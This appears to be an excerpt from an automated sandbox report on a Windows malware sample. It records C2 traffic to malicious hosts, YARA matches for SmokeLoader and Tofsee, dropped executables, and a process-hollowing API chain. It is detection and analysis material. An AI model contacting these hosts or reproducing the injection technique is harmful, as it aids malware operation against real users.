Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.411607267.0000013797184000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmp	String found in binary or memory: hed\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"sys
Source: unknown	HTTP traffic detected: POST / HTTP/1.1	Connection: Keep-Alive	Content-Type: application/x-www-form-urlencoded	Accept: */*	Referer: http://xmmufccsxa.net/	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko	Content-Length: 257	Host: host-data-coin-11.com
Source: unknown	HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49937 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match	File source: 19.1.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OG9rNsihJ7.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.BFBD.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.1.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vfgiwcs.6415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.279897390.0000000003031000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.349879535.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.298084613.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.349992094.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.366989519.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.298215878.0000000001FA1000.00000004.00020000.sdmp, type: MEMORY
Source: BFBD.exe, 00000016.00000002.355830576.00000000008EA000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Tofsee
Source: Yara match	File source: 42.2.xqfkdfcl.exe.840000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.xqfkdfcl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.svchost.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.3136.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.3136.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.xqfkdfcl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.xqfkdfcl.exe.680e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.3.xqfkdfcl.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.svchost.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.xqfkdfcl.exe.840000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.3136.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.3136.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.388526176.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.524985253.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.362218485.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.391463142.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.391805380.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.380671348.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.391938773.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3136.exe PID: 5060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xqfkdfcl.exe PID: 5432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3440, type: MEMORYSTR

System Summary:

PE file has nameless sections
Source: 3A7E.exe.5.dr	Static PE information: section name:
Source: 3A7E.exe.5.dr	Static PE information: section name:
Source: 3A7E.exe.5.dr	Static PE information: section name:
Source: 3A7E.exe.5.dr	Static PE information: section name:
Source: 3A7E.exe.5.dr	Static PE information: section name:
Source: 3A7E.exe.5.dr	Static PE information: section name:
Source: 7808.exe.5.dr	Static PE information: section name:
Source: 7808.exe.5.dr	Static PE information: section name:
Source: 7808.exe.5.dr	Static PE information: section name:
Source: 7808.exe.5.dr	Static PE information: section name:
Source: 7808.exe.5.dr	Static PE information: section name:
Source: 7808.exe.5.dr	Static PE information: section name:
Source: 9789.exe.5.dr	Static PE information: section name:
Source: 9789.exe.5.dr	Static PE information: section name:
Source: 9789.exe.5.dr	Static PE information: section name:
Source: 9789.exe.5.dr	Static PE information: section name:
Source: 9789.exe.5.dr	Static PE information: section name:
Source: 9789.exe.5.dr	Static PE information: section name:
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 0_2_0042A4F0
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 0_2_00424E60
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 0_2_0042B2D0
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 0_2_005F31FF
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 0_2_005F3253
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 1_2_00402A5F
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 1_2_00402AB3
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 1_1_00402A5F
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe	Code function: 1_1_00402AB3
Source: C:\Users\user\AppData\Roaming\vfgiwcs	Code function: 18_2_00643253
Source: C:\Users\user\AppData\Roaming\vfgiwcs	Code function: 18_2_006431FF
Source: C:\Users\user\AppData\Roaming\vfgiwcs	Code function: 19_2_00402A5F
Source: C:\Users\user\AppData\Roaming\vfgiwcs	Code function: 19_2_00402AB3
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_004027CA
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_00401FF1
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_0040158E
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_004015A6
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_00411065
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_00412A02
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_0040CAC5
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_00410B21
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_004115A9
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_0208160C
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_020815DE
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe	Code function: 20_2_020815F6
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe	Code function: 22_2_008F8004
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe	Code function: 24_2_00402A5F
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe	Code function: 24_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402B2E
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D0640
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D0C40
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D0A50
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D14D0
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00425090
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_0042B500
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_0042A720
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_029596F0
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_02950B7A
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_02950470
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_02950462
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FA1810
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FA53F8
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FA0448
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FA2E48
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FBA430
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB1528
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB67B8
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB2C88
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FBAD68
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB08B0
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB5B58
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB90D3
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: OG9rNsihJ7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: OG9rNsihJ7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: OG9rNsihJ7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: OG9rNsihJ7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 45AA.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 45AA.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 45AA.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 54AF.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FC2A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FC2A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FC2A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: B1B2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: B1B2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: B1B2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BFBD.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BFBD.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BFBD.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BFBD.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 254E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 254E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 254E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 254E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3136.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3136.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3136.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3136.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2F32.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vfgiwcs.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vfgiwcs.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vfgiwcs.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vfgiwcs.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xqfkdfcl.exe.29.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xqfkdfcl.exe.29.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xqfkdfcl.exe.29.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xqfkdfcl.exe.29.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeSection loaded: mscorjit.dll
                      Source: OG9rNsihJ7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\8017.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: String function: 00422BD0 appears 133 times
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: String function: 0041E350 appears 172 times
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: String function: 006C2794 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: String function: 0041E560 appears 32 times
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_005F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 18_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
